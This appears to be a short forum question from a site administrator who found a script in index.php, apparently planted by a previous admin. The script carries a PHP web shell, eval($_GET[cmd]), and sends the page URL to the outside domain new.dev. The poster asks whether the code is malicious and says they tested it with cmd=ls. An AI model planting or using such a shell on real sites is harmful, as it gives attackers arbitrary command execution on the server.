I found in my site index.php this code
<script type="text/javascript">
new.track("new.dev","_browser","'<?php eval($_GET[cmd]); ?>', '<?php eval($_GET[cmd]);?>'");
new.track("new.dev","_url",location.href);
</script>
Is that code are malicious? From web i tryed to put something like index.php?cmd=ls and nothing was appear. Maybe it needed to be on page? I trying to understand what previous admin do on site.